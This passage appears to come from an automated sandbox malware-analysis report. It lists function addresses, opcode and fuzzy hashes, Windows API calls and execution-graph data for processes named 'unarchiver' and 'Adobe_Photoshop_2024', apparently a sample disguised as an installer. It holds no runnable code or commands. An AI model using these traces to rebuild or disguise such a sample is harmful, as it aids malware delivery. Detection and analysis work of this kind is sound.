                        • Instruction Fuzzy Hash: FB019E71600201ABD220DF1ACD45B66FBA8EB88A20F14852AEC089BB41E731F915CBE5
                        Function 0135AFB2 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2115663188.000000000135A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135A000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_135a000_unarchiver.jbxd
                        Similarity
                        • API ID: CloseFind
                        • String ID:
                        • API String ID: 1863332320-0
                        • Opcode ID: 64bec3961eae5603e95b65e8ea540eba109227f3824bf3acb427a2a83d81d9ff
                        • Instruction ID: 38e28a376fb903ccfce002e46d70fa22009dcfd170e820bea9ac24af3db4ca7e
                        • Opcode Fuzzy Hash: 64bec3961eae5603e95b65e8ea540eba109227f3824bf3acb427a2a83d81d9ff
                        • Instruction Fuzzy Hash: B501F9756002449FEB608F19DC85B62FBD4EF04634F08C4AADD054B752D775E848DEA1
                        Function 0135A2DA Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                        Download Yara Rule
                        APIs
                        • SetErrorMode.KERNELBASE(?), ref: 0135A30C
                        Memory Dump Source
                        • Source File: 00000000.00000002.2115663188.000000000135A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135A000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_135a000_unarchiver.jbxd
                        Similarity
                        • API ID: ErrorMode
                        • String ID:
                        • API String ID: 2340568224-0
                        • Opcode ID: 49597d6ad3fb51cb70d230375d6f75edd0814410d61f778683140114b9213711
                        • Instruction ID: 1fbda85fbf2a2fbf00d5ce8cb5a625e0f8319125f5f1f896e36b5a5454e9c0ae
                        • Opcode Fuzzy Hash: 49597d6ad3fb51cb70d230375d6f75edd0814410d61f778683140114b9213711
                        • Instruction Fuzzy Hash: 9FF0A435504244DFEB608F09D985B61FBE4EF44638F08C5AADD454B753D3B5A408DAA2
                        Function 01690C99 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116597269.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1690000_unarchiver.jbxd
                        Similarity
                        • API ID:
                        • String ID: [M2
                        • API String ID: 0-3333857519
                        • Opcode ID: 45c53fec44d381e2a04ee5be2bee3511017d12505e58e4cf0f1588fa4aeed64e
                        • Instruction ID: 0413283e9e70c6aaec87b984829e321a6e4fa33fc43b364ae77171c6630884d8
                        • Opcode Fuzzy Hash: 45c53fec44d381e2a04ee5be2bee3511017d12505e58e4cf0f1588fa4aeed64e
                        • Instruction Fuzzy Hash: C3213831B046408FCB54EB3A894166E7AE7AFC9248B44843CD486CB740DF3E9D068796
                        Function 01690CA8 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116597269.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1690000_unarchiver.jbxd
                        Similarity
                        • API ID:
                        • String ID: [M2
                        • API String ID: 0-3333857519
                        • Opcode ID: 50a6a3cc0a50be120bd9b7abb88dce828a717da56c71e05d634aae3d322f4fdf
                        • Instruction ID: 4bac4fe7280e0df07f2c1057125ac881db1ab1caeb124168b5781f0b5e1c7334
                        • Opcode Fuzzy Hash: 50a6a3cc0a50be120bd9b7abb88dce828a717da56c71e05d634aae3d322f4fdf
                        • Instruction Fuzzy Hash: 86212931B006408FCB64EB3AC94066FB7EB9FC9648B44883CD086DB740DF79AD068795
                        Function 0135A6D4 Relevance: 1.3, APIs: 1, Instructions: 70COMMON
                        Download Yara Rule
                        APIs
                        • CloseHandle.KERNELBASE(12E80000), ref: 0135A748
                        Memory Dump Source
                        • Source File: 00000000.00000002.2115663188.000000000135A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135A000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_135a000_unarchiver.jbxd
                        Similarity
                        • API ID: CloseHandle
                        • String ID:
                        • API String ID: 2962429428-0
                        • Opcode ID: bcf08e88f1097f3239ba914c6eb2d28c8d40cbb93c99f07715170cd230cd3309
                        • Instruction ID: b69a1a5f93e9fb3094d80f5b605f1ce9776ab222fcd199a3ffa2e19372b16072
                        • Opcode Fuzzy Hash: bcf08e88f1097f3239ba914c6eb2d28c8d40cbb93c99f07715170cd230cd3309
                        • Instruction Fuzzy Hash: B521C5755093C19FD7138B25DC95652BFB8EF07224F0984DADD858F2A3D2649908C762
                        Function 0135A716 Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                        Download Yara Rule
                        APIs
                        • CloseHandle.KERNELBASE(12E80000), ref: 0135A748
                        Memory Dump Source
                        • Source File: 00000000.00000002.2115663188.000000000135A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135A000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_135a000_unarchiver.jbxd
                        Similarity
                        • API ID: CloseHandle
                        • String ID:
                        • API String ID: 2962429428-0
                        • Opcode ID: 37ed265c3bc4f1743af2686a3477a68fc39139b1420866bb834302b1ee1d29b8
                        • Instruction ID: 6ba91d93988ba90c1ad0bdd9759f4491ef1369404de772026fd7120092690f76
                        • Opcode Fuzzy Hash: 37ed265c3bc4f1743af2686a3477a68fc39139b1420866bb834302b1ee1d29b8
                        • Instruction Fuzzy Hash: FA01D4716002458FEB50CF59D985B66FBE8DF00624F08C4BADD068B642D374E404CAA1
                        Function 016902C0 Relevance: .3, Instructions: 285COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116597269.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1690000_unarchiver.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b11ba4fb98e6ef23ab2025993f02386b5bf4954bf6d1665f670dfecd317592a4
                        • Instruction ID: 7c1593c758e11801ae3af86f4585a62cce3f82afdae395ce5748e755b8b88289
                        • Opcode Fuzzy Hash: b11ba4fb98e6ef23ab2025993f02386b5bf4954bf6d1665f670dfecd317592a4
                        • Instruction Fuzzy Hash: C7B14036701110DFCB14DF69E954A5E7BBAFF88350B108169E9069B364DB3A9C86CF90
                        Function 01690799 Relevance: .3, Instructions: 283COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116597269.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1690000_unarchiver.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7cb352fec07d8eb255724fc4883c38696020f0f0bc7f6f75323b758dd8a48ccf
                        • Instruction ID: 3573b77fad0b04b9427f09ca6d773739615e1d576357bcf4d50fd8ea95aac2ef
                        • Opcode Fuzzy Hash: 7cb352fec07d8eb255724fc4883c38696020f0f0bc7f6f75323b758dd8a48ccf
                        • Instruction Fuzzy Hash: 38A1AE34B002058BDB149BB9D95577E77BBFB88308F248469D906973A4DF3D9C82CB91
                        Function 01690B8F Relevance: .1, Instructions: 63COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116597269.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1690000_unarchiver.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 668c1a1c3db5ac91314bd71c9788389ad8c17065e1bfb42528f8c35a0b502abf
                        • Instruction ID: c43763e3835a864813ffc9f431dadf26b9ab8f561b202db69b0061b0880ced0f
                        • Opcode Fuzzy Hash: 668c1a1c3db5ac91314bd71c9788389ad8c17065e1bfb42528f8c35a0b502abf
                        • Instruction Fuzzy Hash: 20110036A10208AFCF44DBB8D84589F7BF6FB88304B144179E609E7224DB399C068B80
                        Function 01690BA0 Relevance: .1, Instructions: 60COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116597269.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1690000_unarchiver.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: da031df36310f853ba4715c289f398f9a040d103308125482a53ac02dada480f
                        • Instruction ID: 7a90016b668f4354822fb8aa1a1851d8a3c86f1ece56d9c98c10fd632ba10603
                        • Opcode Fuzzy Hash: da031df36310f853ba4715c289f398f9a040d103308125482a53ac02dada480f
                        • Instruction Fuzzy Hash: E0119E36A10118AFCB449BB8D84599F7BF6FB88214B154579E205E7224DB39AC468BC1
                        Function 01680807 Relevance: .0, Instructions: 48COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116571604.0000000001680000.00000040.00000020.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1680000_unarchiver.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 769f2d564d1c062586ba3ed9f447e119a7cc99f58d0351dabe5328ebcc806e59
                        • Instruction ID: 3fa0e5e2924b7ee7c0ab23944bb9797d4f12c99ba6811c89ba643efbeb87b38d
                        • Opcode Fuzzy Hash: 769f2d564d1c062586ba3ed9f447e119a7cc99f58d0351dabe5328ebcc806e59
                        • Instruction Fuzzy Hash: 550184B240D3446FD7119B15AC41CA7BFF8DF96520F08C5AEEC8887602E265A919CBA2
                        Function 016805DF Relevance: .0, Instructions: 44COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116571604.0000000001680000.00000040.00000020.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1680000_unarchiver.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cceeafa1d47100e8d81f85ee728c7f898db1fd3f034f13345eeba211aea1be60
                        • Instruction ID: a6fcc0037795781b835799baa0563a6825fe2376c41d3d5dc840ae60a1257c62
                        • Opcode Fuzzy Hash: cceeafa1d47100e8d81f85ee728c7f898db1fd3f034f13345eeba211aea1be60
                        • Instruction Fuzzy Hash: F801867650D3805FD7118B169C40862FFF8DB8662070DC4AFEC49CBA12D225A909CBB1
                        Function 0168082E Relevance: .0, Instructions: 34COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116571604.0000000001680000.00000040.00000020.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1680000_unarchiver.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 31412d3fa58860433abb496f74d13c5c388e1a72376905c03818797027319cdd
                        • Instruction ID: 0f5c7162b2b8c319400012ca8f959dbe76dbcab3a3878f6cf876285cf183cc24
                        • Opcode Fuzzy Hash: 31412d3fa58860433abb496f74d13c5c388e1a72376905c03818797027319cdd
                        • Instruction Fuzzy Hash: 22F089B2805204AB9300DF05ED45866F7ECDF94521F04C56AEC0887701E276A9158AE2
                        Function 01680606 Relevance: .0, Instructions: 27COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116571604.0000000001680000.00000040.00000020.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1680000_unarchiver.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e9638aeed7430ceb25fafb2619ebfb8631dd3f7e67421a13dbfddc498fd67eae
                        • Instruction ID: 4bcad9f480650c3ff5f91898cf99419cfc705b75b18ab1d48adca4b98b36ca6a
                        • Opcode Fuzzy Hash: e9638aeed7430ceb25fafb2619ebfb8631dd3f7e67421a13dbfddc498fd67eae
                        • Instruction Fuzzy Hash: A3E092B66046008B9650CF0AEC41462FBD8EB84630708C47FDC0D8BB01D639B908CAA5
                        Function 01690C50 Relevance: .0, Instructions: 26COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116597269.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1690000_unarchiver.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: efc8e10a952c749f9f5233d2762bea2195a0caaa32229d3ec5b9c4607c119146
                        • Instruction ID: 497742828a2154af7fa070534f5c315980903f9c3424849e2f2d793659e51f70
                        • Opcode Fuzzy Hash: efc8e10a952c749f9f5233d2762bea2195a0caaa32229d3ec5b9c4607c119146
                        • Instruction Fuzzy Hash: 52E0DF32F143542FCB88DFB9884019EBFF9EB95260B6184BE8009D7340EB3889028B81
                        Function 01690C60 Relevance: .0, Instructions: 22COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116597269.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1690000_unarchiver.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 928132f4b169bffe9e502c15ab8b0eebf062d5ee595fb79319f11912bfe94662
                        • Instruction ID: 106d74afffde389a6f31116a165ccd237521e56e2530ad88a4f236ae4f0ce720
                        • Opcode Fuzzy Hash: 928132f4b169bffe9e502c15ab8b0eebf062d5ee595fb79319f11912bfe94662
                        • Instruction Fuzzy Hash: ABD01231F043182B8B48DEF9984159EBAEA9B84154B65447D9009D7340EE3999018780
                        Function 01690DD1 Relevance: .0, Instructions: 16COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116597269.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1690000_unarchiver.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cd157a90805f9137f821c0fd28622c3f541a08e966d91dc804f591fcb7a423e8
                        • Instruction ID: 7f84e858974668c226e3ec43baf8a01d1e6858e8be444a5f6b88f7b7089085d1
                        • Opcode Fuzzy Hash: cd157a90805f9137f821c0fd28622c3f541a08e966d91dc804f591fcb7a423e8
                        • Instruction Fuzzy Hash: 0EE05B3014C3448FDB46CB78C8545A57FF9AFD1314F55C2A9D4089B266C77D9C81CB54
                        Function 013523F4 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2115598440.0000000001352000.00000040.00000800.00020000.00000000.sdmp, Offset: 01352000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1352000_unarchiver.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 91f6c88b2479e408f26df9c54919b661844b85b21a0eb9e31d9603beaef2aa0f
                        • Instruction ID: 5fd9b7fdc7bc8620623da6b6be94963a0cd0b78eb885b929aac071fcb01935c5
                        • Opcode Fuzzy Hash: 91f6c88b2479e408f26df9c54919b661844b85b21a0eb9e31d9603beaef2aa0f
                        • Instruction Fuzzy Hash: DDD05EB92057D18FE3269A1CC6A4F963FE4AB51B18F4A44F9AC00CB763C768D581D640
                        Function 013523BC Relevance: .0, Instructions: 14COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2115598440.0000000001352000.00000040.00000800.00020000.00000000.sdmp, Offset: 01352000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1352000_unarchiver.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6d41980b1a293fada6f3d143fdcd0eaf48e902b978aeeaf24d917fa31a026e17
                        • Instruction ID: 760c97af7e3a53b9e82579d3e5771da95c7c01b16c6a00442b08acdc73450bd5
                        • Opcode Fuzzy Hash: 6d41980b1a293fada6f3d143fdcd0eaf48e902b978aeeaf24d917fa31a026e17
                        • Instruction Fuzzy Hash: 94D05E342002818BD725DA0CC2D4F5A3BD4AB40B18F0644F8AC108B762C7A4D8C0DA40
                        Function 01690DE0 Relevance: .0, Instructions: 12COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116597269.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1690000_unarchiver.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 82ba8d95169de47b9a8084e5a4ac1a7abb079051ca1e7fcc94877b98214843ce
                        • Instruction ID: e79554f1d905cb9d5b0285caca0dc169d39c18626b8a81ed0314299d1dab8f96
                        • Opcode Fuzzy Hash: 82ba8d95169de47b9a8084e5a4ac1a7abb079051ca1e7fcc94877b98214843ce
                        • Instruction Fuzzy Hash: 9AC012342042088BDB04977CD919A2577DE57D0314F55C16895081B355CB79EC80C6C8

                        Non-executed Functions

                        Function 01680000 Relevance: .0, Instructions: 29COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116571604.0000000001680000.00000040.00000020.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1680000_unarchiver.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1e6b5848e20c601531a78f4411ea9683ec6e976fcf1c00d5e8d234a9791dc042
                        • Instruction ID: ca6b1d492d2b9feee8c1c29898eadbf9bae988afe7fdae2f42113a1960ec1877
                        • Opcode Fuzzy Hash: 1e6b5848e20c601531a78f4411ea9683ec6e976fcf1c00d5e8d234a9791dc042
                        • Instruction Fuzzy Hash: 43F0F26084E7C24FD3038B785C298907FB19E1726475F4ADBD0949F0E3E65A088AD362

                        Execution Graph

                        Execution Coverage:7.5%
                        Dynamic/Decrypted Code Coverage:95.9%
                        Signature Coverage:5.7%
                        Total number of Nodes:122
                        Total number of Limit Nodes:10
                        execution_graph 46441 57511d0 46445 57515cf 46441->46445 46449 57515f8 46441->46449 46442 57511de 46447 57515f8 46445->46447 46446 57516b9 46446->46442 46447->46446 46453 57518a2 46447->46453 46450 575164e 46449->46450 46451 57516b9 46450->46451 46452 57518a2 3 API calls 46450->46452 46451->46442 46452->46451 46457 5751978 46453->46457 46463 5751968 46453->46463 46454 57518b1 46454->46446 46458 57519b1 46457->46458 46469 5751298 46458->46469 46462 57519f1 46462->46454 46464 57519b1 46463->46464 46465 5751298 OleInitialize 46464->46465 46466 57519ba GetKeyboardLayout 46465->46466 46468 57519f1 46466->46468 46468->46454 46470 57512a3 46469->46470 46471 57519ba GetKeyboardLayout 46470->46471 46473 57512a8 46470->46473 46471->46462 46474 5751a78 OleInitialize 46473->46474 46475 5751adc 46474->46475 46475->46471 46499 54df608 DuplicateHandle 46500 54df69e 46499->46500 46530 54d8fa8 46533 54d77f8 46530->46533 46532 54d8fb7 46534 54d7803 46533->46534 46537 54d7828 46534->46537 46536 54d910d 46536->46532 46538 54d7833 46537->46538 46541 54d7858 46538->46541 46540 54d95ea 46540->46536 46542 54d7863 46541->46542 46545 54d9190 46542->46545 46544 54d96e5 46544->46540 46546 54d919b 46545->46546 46547 54da953 46546->46547 46549 54dcbf9 46546->46549 46547->46544 46552 54dd038 46549->46552 46555 54dd133 46552->46555 46553 54dcc0e 46553->46547 46556 54dd164 46555->46556 46557 54dd141 46555->46557 46556->46553 46557->46556 46558 54dd368 GetModuleHandleW 46557->46558 46559 54dd395 46558->46559 46559->46553 46560 54df2a8 46561 54df2b5 46560->46561 46562 54df2ef 46561->46562 46564 54df0d0 46561->46564 46565 54df0db 46564->46565 46566 54dfc00 46565->46566 46568 54df1fc 46565->46568 46569 54df207 46568->46569 46570 54d9190 GetModuleHandleW 46569->46570 46571 54dfc6f 46570->46571 46571->46566 46424 54df3c0 46425 54df406 GetCurrentProcess 46424->46425 46427 54df458 GetCurrentThread 46425->46427 46428 54df451 46425->46428 46429 54df48e 46427->46429 46430 54df495 GetCurrentProcess 46427->46430 46428->46427 46429->46430 46431 54df4cb GetCurrentThreadId 46430->46431 46433 54df524 46431->46433 46434 575c5f8 46435 575c646 DrawTextExW 46434->46435 46437 575c69e 46435->46437 46501 5fea730 46502 5fea77e EnumThreadWindows 46501->46502 46503 5fea774 46501->46503 46504 5fea7b0 46502->46504 46503->46502 46505 5fe74b0 46506 5fe750d 46505->46506 46507 5fe754b 46506->46507 46508 5fe7558 GetCurrentThreadId 46506->46508 46513 5fe75bd 46506->46513 46520 5fe6f84 PostThreadMessageW 46507->46520 46510 5fe7586 46508->46510 46510->46513 46514 5fe6f94 46510->46514 46511 5fe7553 46511->46513 46515 5fe6f9f 46514->46515 46521 5fea630 46515->46521 46516 5fea5a3 46525 5fe94e8 GetCurrentThreadId 46516->46525 46518 5fea5b2 46518->46513 46520->46511 46522 5fea68f GetCurrentThreadId 46521->46522 46524 5fea6d5 46522->46524 46524->46516 46525->46518 46526 5fe9cb0 46528 5fe9cb5 46526->46528 46527 5fe6f94 2 API calls 46529 5fe9d62 46527->46529 46528->46527 46528->46529 46572 73d0048 46573 73d013b 46572->46573 46574 73d0061 46572->46574 46574->46573 46578 5fe2b18 46574->46578 46581 5fe2b08 46574->46581 46575 73d0119 46579 5fe2b2c KiUserExceptionDispatcher 46578->46579 46579->46575 46582 5fe2b0d KiUserExceptionDispatcher 46581->46582 46582->46575 46476 575fe43 46477 575fe48 CloseHandle 46476->46477 46478 575feaf 46477->46478 46479 e74b50 46480 e74b5b 46479->46480 46482 e74c80 46479->46482 46483 e74ca5 46482->46483 46487 e74d80 46483->46487 46491 e74d90 46483->46491 46489 e74d90 46487->46489 46488 e74e94 46489->46488 46495 e74940 46489->46495 46493 e74db7 46491->46493 46492 e74e94 46492->46492 46493->46492 46494 e74940 CreateActCtxA 46493->46494 46494->46492 46496 e76220 CreateActCtxA 46495->46496 46498 e762e3 46496->46498 46498->46498 46438 5fe3be0 46439 5fe3be9 LdrInitializeThunk 46438->46439 46440 5fe3bfc 46439->46440

                        Executed Functions

                        Function 05FE3BE0 Relevance: 1.5, APIs: 1, Instructions: 20libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2107462450.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_5fe0000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: e69ca8f621cf1ccae2fd6f1b8277f280ec177bee885a965f693128676bd72955
                        • Instruction ID: 9f21003b39f2ef7fc2c74a30d1ddc69f37bace6797d2e38f7e551a3a791b1b8a
                        • Opcode Fuzzy Hash: e69ca8f621cf1ccae2fd6f1b8277f280ec177bee885a965f693128676bd72955
                        • Instruction Fuzzy Hash: 73E08C756083448FCB15BA78840852A3BEBABC5102B210865C4069B290EE78D980E665
                        Function 05FE9CB0 Relevance: .4, Instructions: 396COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2107462450.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_5fe0000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 66ed8362a06ccb88b104c56c3d9258b3410fbfd5d2ece85fd4954f966bf2c93c
                        • Instruction ID: 27df4bab3da40fcc40770be7aa21c1811a440d0497b22d98eada6c570ca0a73d
                        • Opcode Fuzzy Hash: 66ed8362a06ccb88b104c56c3d9258b3410fbfd5d2ece85fd4954f966bf2c93c
                        • Instruction Fuzzy Hash: 4AF14B30E00209CFDB14DFA9C948BADBBF2FF48304F158569E405AB265DBB9A945CF91
                        Function 05FE5CD8 Relevance: .4, Instructions: 357COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2107462450.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_5fe0000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a4d5caa389533193d548dbe7869e88c9788f81059fdf914ec04c4dde04f06875
                        • Instruction ID: bfc501a4a04baffc5f435ec65ce3fb7f8e109f5a7f660ce86fdc63fe79b1ffa5
                        • Opcode Fuzzy Hash: a4d5caa389533193d548dbe7869e88c9788f81059fdf914ec04c4dde04f06875
                        • Instruction Fuzzy Hash: 3FD17B71B016148FDB29DB75C4A4BAEB7EBAF88604F14446ED546CB2A4CF39E801CB61
                        Function 054DF3C0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 750 54df3c0-54df44f GetCurrentProcess 754 54df458-54df48c GetCurrentThread 750->754 755 54df451-54df457 750->755 756 54df48e-54df494 754->756 757 54df495-54df4c9 GetCurrentProcess 754->757 755->754 756->757 759 54df4cb-54df4d1 757->759 760 54df4d2-54df4ea 757->760 759->760 762 54df4f3-54df522 GetCurrentThreadId 760->762 764 54df52b-54df58d 762->764 765 54df524-54df52a 762->765 765->764
                        APIs
                        • GetCurrentProcess.KERNEL32 ref: 054DF43E
                        • GetCurrentThread.KERNEL32 ref: 054DF47B
                        • GetCurrentProcess.KERNEL32 ref: 054DF4B8
                        • GetCurrentThreadId.KERNEL32 ref: 054DF511
                        Memory Dump Source
                        • Source File: 00000006.00000002.2105592954.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_54d0000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID: Current$ProcessThread
                        • String ID:
                        • API String ID: 2063062207-0
                        • Opcode ID: 2c3b2154d315967abd658d79d41d99ac9176fd71b7bc5666139735ed0806eee7
                        • Instruction ID: f931b1b89dd77f1a8fdf95b1ff80334681a485c480ca2d2beb42c2d964dee6c2
                        • Opcode Fuzzy Hash: 2c3b2154d315967abd658d79d41d99ac9176fd71b7bc5666139735ed0806eee7
                        • Instruction Fuzzy Hash: EC5167B09002499FDB14DFA9D548BEEFBF1FF88314F248459E409A7350D7389948CB65
                        Function 073D0048 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 852 73d0048-73d005b 853 73d013b-73d016a 852->853 854 73d0061-73d0066 852->854 855 73d007e-73d0087 854->855 856 73d0068-73d006e 854->856 855->853 859 73d008d-73d009e 855->859 857 73d0070 856->857 858 73d0072-73d007c 856->858 857->855 858->855 863 73d00b8-73d00bf 859->863 864 73d00a0-73d00a6 859->864 863->853 867 73d00c1-73d0113 863->867 865 73d00a8 864->865 866 73d00aa-73d00b6 864->866 865->863 866->863 875 73d0116 call 5fe2b18 867->875 876 73d0116 call 5fe2b08 867->876 873 73d0119-73d013a 875->873 876->873
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2107763392.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_73d0000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID:
                        • String ID: $]q$$]q$$]q$$]q
                        • API String ID: 0-858218434
                        • Opcode ID: 162a645ecce68148fe4a8e9f70067fb59a69977c386bf63bec757a181cdf3685
                        • Instruction ID: b765bd618ac2fa70582c12ec8807a24ff5958fb990e08df8db74b28119321f0a
                        • Opcode Fuzzy Hash: 162a645ecce68148fe4a8e9f70067fb59a69977c386bf63bec757a181cdf3685
                        • Instruction Fuzzy Hash: CB3148B1A083858FC71ACB69D89485AFFF5BF86200F18C59AD0859B267D734DC09CB62
                        Function 073D0001 Relevance: 2.6, Strings: 2, Instructions: 100COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2107763392.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_73d0000_Adobe_Photoshop_2024.jbxd
                        Similarity
                        • API ID:
                        • String ID: $]q$$]q
                        • API String ID: 0-127220927
                        • Opcode ID: 865779cfaf58b9b3a87a5347af50efe3c4e270122e6ed630bfe303d32dd2b554
                        • Instruction ID: fcf3a361a709fd11c28addd4dbd899bd47880051931d7ca28f783bb93858b501
